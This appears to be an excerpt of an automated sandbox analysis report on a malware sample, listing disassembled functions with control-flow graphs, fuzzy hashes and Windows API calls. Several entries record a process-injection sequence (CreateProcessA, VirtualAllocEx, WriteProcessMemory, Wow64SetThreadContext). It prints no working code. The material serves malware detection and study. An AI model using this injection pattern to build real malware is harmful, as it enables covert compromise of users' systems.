                                                                                                  Function 056FCEB8 Relevance: 1.7, APIs: 1, Instructions: 201processCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1739 56fceb8-56fcf28 1741 56fcf2a-56fcf34 1739->1741 1742 56fcf61-56fcf81 1739->1742 1741->1742 1743 56fcf36-56fcf38 1741->1743 1747 56fcfba-56fcff4 1742->1747 1748 56fcf83-56fcf8d 1742->1748 1745 56fcf5b-56fcf5e 1743->1745 1746 56fcf3a-56fcf44 1743->1746 1745->1742 1749 56fcf48-56fcf57 1746->1749 1750 56fcf46 1746->1750 1758 56fd02d-56fd0a2 CreateProcessA 1747->1758 1759 56fcff6-56fd000 1747->1759 1748->1747 1751 56fcf8f-56fcf91 1748->1751 1749->1749 1752 56fcf59 1749->1752 1750->1749 1753 56fcfb4-56fcfb7 1751->1753 1754 56fcf93-56fcf9d 1751->1754 1752->1745 1753->1747 1756 56fcf9f 1754->1756 1757 56fcfa1-56fcfb0 1754->1757 1756->1757 1757->1757 1760 56fcfb2 1757->1760 1769 56fd0ab-56fd0f3 1758->1769 1770 56fd0a4-56fd0aa 1758->1770 1759->1758 1761 56fd002-56fd004 1759->1761 1760->1753 1763 56fd027-56fd02a 1761->1763 1764 56fd006-56fd010 1761->1764 1763->1758 1765 56fd014-56fd023 1764->1765 1766 56fd012 1764->1766 1765->1765 1767 56fd025 1765->1767 1766->1765 1767->1763 1775 56fd0f5-56fd0f9 1769->1775 1776 56fd103-56fd107 1769->1776 1770->1769 1775->1776 1777 56fd0fb 1775->1777 1778 56fd109-56fd10d 1776->1778 1779 56fd117-56fd11b 1776->1779 1777->1776 1778->1779 1780 56fd10f 1778->1780 1781 56fd11d-56fd121 1779->1781 1782 56fd12b 1779->1782 1780->1779 1781->1782 1783 56fd123 1781->1783 1784 56fd12c 1782->1784 1783->1782 1784->1784
                                                                                                  APIs
                                                                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 056FD092
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3512002675.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_56f0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 963392458-0
                                                                                                  • Opcode ID: 635316db46b5ecba794ae193b59b6552d6216e8da550b3cdd39c9fcb02868779
                                                                                                  • Instruction ID: 2bc57975715aeba661bf26d7d22e304d8eea516a5fd41f0066fb694c80d8dcba
                                                                                                  • Opcode Fuzzy Hash: 635316db46b5ecba794ae193b59b6552d6216e8da550b3cdd39c9fcb02868779
                                                                                                  • Instruction Fuzzy Hash: 34813471D04259AFEB10DFA9C8857AEBBF2FF48314F248129E919E7340DB759881CB81
                                                                                                  Function 056F20EC Relevance: 1.6, APIs: 1, Instructions: 145fileCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1785 56f20ec-56f2159 1787 56f215b-56f2165 1785->1787 1788 56f2192-56f21b2 1785->1788 1787->1788 1789 56f2167-56f2169 1787->1789 1793 56f21eb-56f224d CopyFileA 1788->1793 1794 56f21b4-56f21be 1788->1794 1791 56f218c-56f218f 1789->1791 1792 56f216b-56f2175 1789->1792 1791->1788 1795 56f2179-56f2188 1792->1795 1796 56f2177 1792->1796 1806 56f224f-56f2255 1793->1806 1807 56f2256-56f229e 1793->1807 1794->1793 1797 56f21c0-56f21c2 1794->1797 1795->1795 1798 56f218a 1795->1798 1796->1795 1799 56f21e5-56f21e8 1797->1799 1800 56f21c4-56f21ce 1797->1800 1798->1791 1799->1793 1802 56f21d2-56f21e1 1800->1802 1803 56f21d0 1800->1803 1802->1802 1804 56f21e3 1802->1804 1803->1802 1804->1799 1806->1807 1812 56f22ae-56f22b2 1807->1812 1813 56f22a0-56f22a4 1807->1813 1815 56f22b4-56f22b8 1812->1815 1816 56f22c2 1812->1816 1813->1812 1814 56f22a6 1813->1814 1814->1812 1815->1816 1817 56f22ba 1815->1817 1818 56f22c3 1816->1818 1817->1816 1818->1818
                                                                                                  APIs
                                                                                                  • CopyFileA.KERNEL32(?,?,?), ref: 056F223D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3512002675.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_56f0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CopyFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 1304948518-0
                                                                                                  • Opcode ID: de89ecf5d0a173d7efd8a1c705630d9a4241540beebafb367221b84a9a7a87ae
                                                                                                  • Instruction ID: bc735050d9a1d772d0d2bbae5aaa9352c3eb2752ba551db1ab3dc3177f43fdef
                                                                                                  • Opcode Fuzzy Hash: de89ecf5d0a173d7efd8a1c705630d9a4241540beebafb367221b84a9a7a87ae
                                                                                                  • Instruction Fuzzy Hash: 8151A7B1D006599FDB20CFA8CC917AEBBF2BF48310F148129EA55A7784DB749881CF80
                                                                                                  Function 056F20F8 Relevance: 1.6, APIs: 1, Instructions: 143fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CopyFileA.KERNEL32(?,?,?), ref: 056F223D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3512002675.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_56f0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CopyFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 1304948518-0
                                                                                                  • Opcode ID: 9ba89a95ce819c544b1c7043593ab4801b0a503482bfd045734d93131ebbd865
                                                                                                  • Instruction ID: 7a9a2d54f11850b1918ea910ff2c9515b31099df5962f8b408035191b03b53a5
                                                                                                  • Opcode Fuzzy Hash: 9ba89a95ce819c544b1c7043593ab4801b0a503482bfd045734d93131ebbd865
                                                                                                  • Instruction Fuzzy Hash: A8518670D006599FDB20DFA9CC957AEBBF2BF48310F148129EA55A7784DB789881CF81
                                                                                                  Function 026C1359 Relevance: 1.6, Strings: 1, Instructions: 371COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3469350443.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_26c0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @
                                                                                                  • API String ID: 0-2766056989
                                                                                                  • Opcode ID: 8531911d3c5cffdea87650e3dfdc0cd261fe1e6cb223416c6db7903721704523
                                                                                                  • Instruction ID: ee08fcdab4e8a0895e7a7b64baa99596af7d3e6a143e54e5540e68c65e65bb2f
                                                                                                  • Opcode Fuzzy Hash: 8531911d3c5cffdea87650e3dfdc0cd261fe1e6cb223416c6db7903721704523
                                                                                                  • Instruction Fuzzy Hash: 27E17174B08144CFDB04EBA9D494BADBBF1EF4A314F2445A9E44ADB3A6CA30DC46CB41
                                                                                                  Function 062E58A0 Relevance: 1.6, Strings: 1, Instructions: 356COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3523890799.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_62e0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: d
                                                                                                  • API String ID: 0-2564639436
                                                                                                  • Opcode ID: 2fa71d2c73a04148c38c2a035c175d5b3afe9bc1319d34895a96c751f541a543
                                                                                                  • Instruction ID: 2b72829d3cc6085a067c3251d8607aa0440a5f557bf8158f9cbe168713901eed
                                                                                                  • Opcode Fuzzy Hash: 2fa71d2c73a04148c38c2a035c175d5b3afe9bc1319d34895a96c751f541a543
                                                                                                  • Instruction Fuzzy Hash: A3D19C30B20606CFC714CF29C49096AB7F6FF88314B998969E95A9B355DB31FC41CB94
                                                                                                  Function 056FDF08 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 056FDFA0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3512002675.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_56f0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MemoryProcessWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 3559483778-0
                                                                                                  • Opcode ID: 542ca7703d7f18d9641aa4c45dd58cb326dd8388725eb433b0320672d26e166a
                                                                                                  • Instruction ID: 182662d96753005e4b7edb2b9ee455856101709f4653aded5a264e7a3ad234c7
                                                                                                  • Opcode Fuzzy Hash: 542ca7703d7f18d9641aa4c45dd58cb326dd8388725eb433b0320672d26e166a
                                                                                                  • Instruction Fuzzy Hash: E5212871D013499FDB10CFA9C845BDEBBF5BF48314F108429EA59A7340D775A550CBA0
                                                                                                  Function 056FDF10 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 056FDFA0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3512002675.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_56f0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MemoryProcessWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 3559483778-0
                                                                                                  • Opcode ID: 4a058244afc5837fdd1919e09663420abd6af75deda0af6975dc5f4029981097
                                                                                                  • Instruction ID: d9a6613f85cd3a1a35641f7ee9cd27800aecc3f2daa1f8a1e3a0b09908a7e47a
                                                                                                  • Opcode Fuzzy Hash: 4a058244afc5837fdd1919e09663420abd6af75deda0af6975dc5f4029981097
                                                                                                  • Instruction Fuzzy Hash: AF2115719003499FDB10DFAAC881BDEBBF5FF48310F108429EA19A7340D779A950CBA4
                                                                                                  Function 056FE5C8 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 056FE64E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3512002675.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_56f0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ContextThreadWow64
                                                                                                  • String ID:
                                                                                                  • API String ID: 983334009-0
                                                                                                  • Opcode ID: 718ad009873619e5b9c08ca2e7e34f1acf4aea32dc0f515e0f427a39c4f7158a
                                                                                                  • Instruction ID: 6eaf495f28af6e6c497f27b03694b6b8686c191092d3b0b99c089d4d39218900
                                                                                                  • Opcode Fuzzy Hash: 718ad009873619e5b9c08ca2e7e34f1acf4aea32dc0f515e0f427a39c4f7158a
                                                                                                  • Instruction Fuzzy Hash: 53214871D003098FDB50DFAAC485BAEBBF4FF88324F14842AD519A7240DB799944CBA5
                                                                                                  Function 056FE5D0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 056FE64E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3512002675.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_56f0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ContextThreadWow64
                                                                                                  • String ID:
                                                                                                  • API String ID: 983334009-0
                                                                                                  • Opcode ID: 1a9bdc78675597be2f0ea5fbd4686c7522f588b0827dd9650c83a1b7a70a3152
                                                                                                  • Instruction ID: bbb19096aadfc5a9ff18ca81e6547cb66fb14bd1ad14cd618593fcf2b26962f9
                                                                                                  • Opcode Fuzzy Hash: 1a9bdc78675597be2f0ea5fbd4686c7522f588b0827dd9650c83a1b7a70a3152
                                                                                                  • Instruction Fuzzy Hash: F9211571D003098FDB50DFAAC485BAEBBF4FF88324F14842AD559A7240DB79A944CFA5
                                                                                                  Function 061D78C8 Relevance: 1.6, APIs: 1, Instructions: 63memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 061D7944
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3521313599.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_61d0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ProtectVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 544645111-0
                                                                                                  • Opcode ID: 5411afaefce0409f5df57b8627c9ca2938b0ed4be1d31e4684f0e4a8aaad5ac7
                                                                                                  • Instruction ID: 80b2d7d0e6c16cb917ddf80cd4e3c53540961694817e2a302ee3ea70f05ee185
                                                                                                  • Opcode Fuzzy Hash: 5411afaefce0409f5df57b8627c9ca2938b0ed4be1d31e4684f0e4a8aaad5ac7
                                                                                                  • Instruction Fuzzy Hash: 24213972C003499FDB10DFAAC881BEEBBF4EF48320F148429E559A7240D7789550CFA5
                                                                                                  Function 061D78D0 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 061D7944
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3521313599.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_61d0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ProtectVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 544645111-0
                                                                                                  • Opcode ID: 1185c0481cbe4f85fabeec974646915943e1c0eb1c6f96b1917113339dc14312
                                                                                                  • Instruction ID: 29c21852d84ee2fe75927de6a2455197a6fc207dc7c9350c902ad444094d7c9e
                                                                                                  • Opcode Fuzzy Hash: 1185c0481cbe4f85fabeec974646915943e1c0eb1c6f96b1917113339dc14312
                                                                                                  • Instruction Fuzzy Hash: C5211871C003099FDB10DFAAC441BAEBBF4EF48320F148429D559A7240D7799540CFA5
                                                                                                  Function 056FEB68 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 056FEBDE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3512002675.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_56f0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 4275171209-0
                                                                                                  • Opcode ID: 46dbfdefcd0e96b8300c5e747024f530ccdf31a12d33410ffb02744172654e43
                                                                                                  • Instruction ID: cb4605d52f7f10719044867d162ba1283b4e7299489cdc1cb2971b8d7cb8a369
                                                                                                  • Opcode Fuzzy Hash: 46dbfdefcd0e96b8300c5e747024f530ccdf31a12d33410ffb02744172654e43
                                                                                                  • Instruction Fuzzy Hash: 7E116776D002499FDB10CFAAC844BDEBFF5AF88320F10841AE616A7210C7769904CBA1
                                                                                                  Function 0641D938 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • VirtualProtect.KERNEL32(?,?,?,?), ref: 0641D9AC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3526077058.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6410000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ProtectVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 544645111-0
                                                                                                  • Opcode ID: d998351322fee4d0d7842502914661173d519afa9549d2140896f01f13de927e
                                                                                                  • Instruction ID: ad02c29c421e9690aa31f71f5c81a4451bea6fab6e90dc87ac13963a47f0ba32
                                                                                                  • Opcode Fuzzy Hash: d998351322fee4d0d7842502914661173d519afa9549d2140896f01f13de927e
                                                                                                  • Instruction Fuzzy Hash: 6B11F4B1D003499FDB10DFAAC884B9EFBF4EF88320F14842AE519A7240C775A940CFA1
                                                                                                  Function 056FEB70 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 056FEBDE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3512002675.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_56f0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 4275171209-0
                                                                                                  • Opcode ID: b28d5822273b5d61a406430d4947ee31c25394f0e930a7ba47220b653708dd6a
                                                                                                  • Instruction ID: c7bde353081521ee3947d311371115f910a30b048a9a1ccf680a3d117636d2fc
                                                                                                  • Opcode Fuzzy Hash: b28d5822273b5d61a406430d4947ee31c25394f0e930a7ba47220b653708dd6a
                                                                                                  • Instruction Fuzzy Hash: B61159718002499FDB10DFAAC844BDEBBF5EF88320F108419E515A7250C7759910CBA1
                                                                                                  Function 06318962 Relevance: 1.4, Strings: 1, Instructions: 190COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3524271343.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6310000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @
                                                                                                  • API String ID: 0-2766056989
                                                                                                  • Opcode ID: 894f6e4df0f4321ecd5b2f1e8b6813836e300329d18d32fc3f0afbf057595076
                                                                                                  • Instruction ID: 4cffaf0e90628647bd12f39df43fd7cbb44480ec62c087961dc6713db0e7ef88
                                                                                                  • Opcode Fuzzy Hash: 894f6e4df0f4321ecd5b2f1e8b6813836e300329d18d32fc3f0afbf057595076
                                                                                                  • Instruction Fuzzy Hash: BFA1AD74A05228CFEBA4DF29CC94B9AB7B6FB49304F1081DAD909A7344D7305E85CF95
                                                                                                  Function 066A503D Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3527049438.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_66a0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: N
                                                                                                  • API String ID: 0-1130791706
                                                                                                  • Opcode ID: 1377a61967db33e303ad593c8ead9b1e436d1cbc42207ecf899eef7534129812
                                                                                                  • Instruction ID: c6d7d2b4bef87682b6b23039aa9833a84e26e9fb69d913739687333b3a1598f9
                                                                                                  • Opcode Fuzzy Hash: 1377a61967db33e303ad593c8ead9b1e436d1cbc42207ecf899eef7534129812
                                                                                                  • Instruction Fuzzy Hash: 6E31D274A04269CFCBA4DF28C884AE9B7B1FB48304F1040EA9519A7745DB31AEC1DF91
                                                                                                  Function 0641E920 Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • VirtualAlloc.KERNEL32(?,?,?,?), ref: 0641E98B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3526077058.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6410000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 4275171209-0
                                                                                                  • Opcode ID: eb547550787cfdf0c247acdd99a50c713679e88cfa997a39fc23d1fa6886feae
                                                                                                  • Instruction ID: bf203967fa443b2432cc5bcbca23fcbaff2e9b0a1651ee13c934f322967d4ad6
                                                                                                  • Opcode Fuzzy Hash: eb547550787cfdf0c247acdd99a50c713679e88cfa997a39fc23d1fa6886feae
                                                                                                  • Instruction Fuzzy Hash: 34112675900249DFDB10DFAAC845BDEBBF5AF88320F14841AE519A7250C775A540CB95
                                                                                                  Function 06218AFA Relevance: 1.3, Strings: 1, Instructions: 42COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3523013759.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6210000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Q
                                                                                                  • API String ID: 0-3463352047
                                                                                                  • Opcode ID: 27db685947dacf2446bf7a04235f759e852d7c0aff05d90d08d2ce6b60c442a7
                                                                                                  • Instruction ID: 67432fd910f4d699b34326aa3b1833babd686ee0b6678f5f014f12a4585050fe
                                                                                                  • Opcode Fuzzy Hash: 27db685947dacf2446bf7a04235f759e852d7c0aff05d90d08d2ce6b60c442a7
                                                                                                  • Instruction Fuzzy Hash: 8911FA70D2A269DFEBA19F64DC88B9DB7F1BB51304F105296D919B7280C7B84A84CF05
                                                                                                  Function 066A7F39 Relevance: 1.3, Strings: 1, Instructions: 41COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3527049438.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_66a0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ]
                                                                                                  • API String ID: 0-3352871620
                                                                                                  • Opcode ID: 7d44252d083e2774421761a909efb6ec9c4c057e3443a09da6173f9439abacbb
                                                                                                  • Instruction ID: 894f7c835fcb2591cb685519c79c6522924795f26417825b41c2b0652079c217
                                                                                                  • Opcode Fuzzy Hash: 7d44252d083e2774421761a909efb6ec9c4c057e3443a09da6173f9439abacbb
                                                                                                  • Instruction Fuzzy Hash: 4C110470A4222ACFEBE89F54C858BE9B3B1FB09308F4540E9C119A3680DB750EC58F12
                                                                                                  Function 066A23FE Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3527049438.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_66a0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ]
                                                                                                  • API String ID: 0-3352871620
                                                                                                  • Opcode ID: 671bf069a39ae77075cc0a897e4bb77640f11c7db83fd3252caddb9b6c02f753
                                                                                                  • Instruction ID: b596356cc0ef2679c43f488bb54119f41c31ba5508d23b2d16c901ac1feded1e
                                                                                                  • Opcode Fuzzy Hash: 671bf069a39ae77075cc0a897e4bb77640f11c7db83fd3252caddb9b6c02f753
                                                                                                  • Instruction Fuzzy Hash: B6015A70A05269CFEBA4DF24C868BAD77B1FF05308F0004E9D109A3680DA760E858F46
                                                                                                  Function 062187E3 Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3523013759.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6210000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 1
                                                                                                  • API String ID: 0-2212294583
                                                                                                  • Opcode ID: b824d0f2525a48f4de33c1a25ed911f7d70cd8821931aa2e1dbc9cc9c18d40a5
                                                                                                  • Instruction ID: cf3cc4aa459592aeeb853691b1228634febe0b2726c90775f036976af07199c8
                                                                                                  • Opcode Fuzzy Hash: b824d0f2525a48f4de33c1a25ed911f7d70cd8821931aa2e1dbc9cc9c18d40a5
                                                                                                  • Instruction Fuzzy Hash: EA019A749242A89FDBA1DF24D880BECBBB1BB59304F0041EADC19A7244D7745F818F40
                                                                                                  Function 06317FAC Relevance: 1.3, Strings: 1, Instructions: 21COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3524271343.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6310000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: "
                                                                                                  • API String ID: 0-123907689
                                                                                                  • Opcode ID: 589ae0201170de1da09cefaf8af93a14c1de13c887f4a687ed1df787ca8d06ef
                                                                                                  • Instruction ID: 6a8e6f5d89808e40d73882ce1f33f0cdae1b009d34dca64fe8d5acc5bdc0f40e
                                                                                                  • Opcode Fuzzy Hash: 589ae0201170de1da09cefaf8af93a14c1de13c887f4a687ed1df787ca8d06ef
                                                                                                  • Instruction Fuzzy Hash: C1F01570911258CFDBA4CF89D848BDEB7F9FB05308F148094E019AB288C7745981CF90
                                                                                                  Function 062E8D80 Relevance: .7, Instructions: 677COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3523890799.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_62e0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: dcd1da08e41c71295f29a86993055f6feb890e24922a831674b29872ee22d1d0
                                                                                                  • Instruction ID: 5bb5ac41c7390db936a7faf8522141470772efe0c71387fc5455530a8320b1b7
                                                                                                  • Opcode Fuzzy Hash: dcd1da08e41c71295f29a86993055f6feb890e24922a831674b29872ee22d1d0
                                                                                                  • Instruction Fuzzy Hash: CB52F775E102289FDB64DB69C941BDDBBF2BF88300F5541E9E909AB351DA309E80CF61
                                                                                                  Function 026C204B Relevance: .6, Instructions: 614COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3469350443.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_26c0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5a007f817cbc9697176e09d073a1b3a99874611e425abc82811578ce8faf067f
                                                                                                  • Instruction ID: d5ec6653c4e71908efb4be3181e5d3552accf16a3550bab195585cad9c573d47
                                                                                                  • Opcode Fuzzy Hash: 5a007f817cbc9697176e09d073a1b3a99874611e425abc82811578ce8faf067f
                                                                                                  • Instruction Fuzzy Hash: DE5217B0901204CFD3A4EF48D9A9AA97BB1FB01308F65D49DE8255F36AC7B6D885CF50
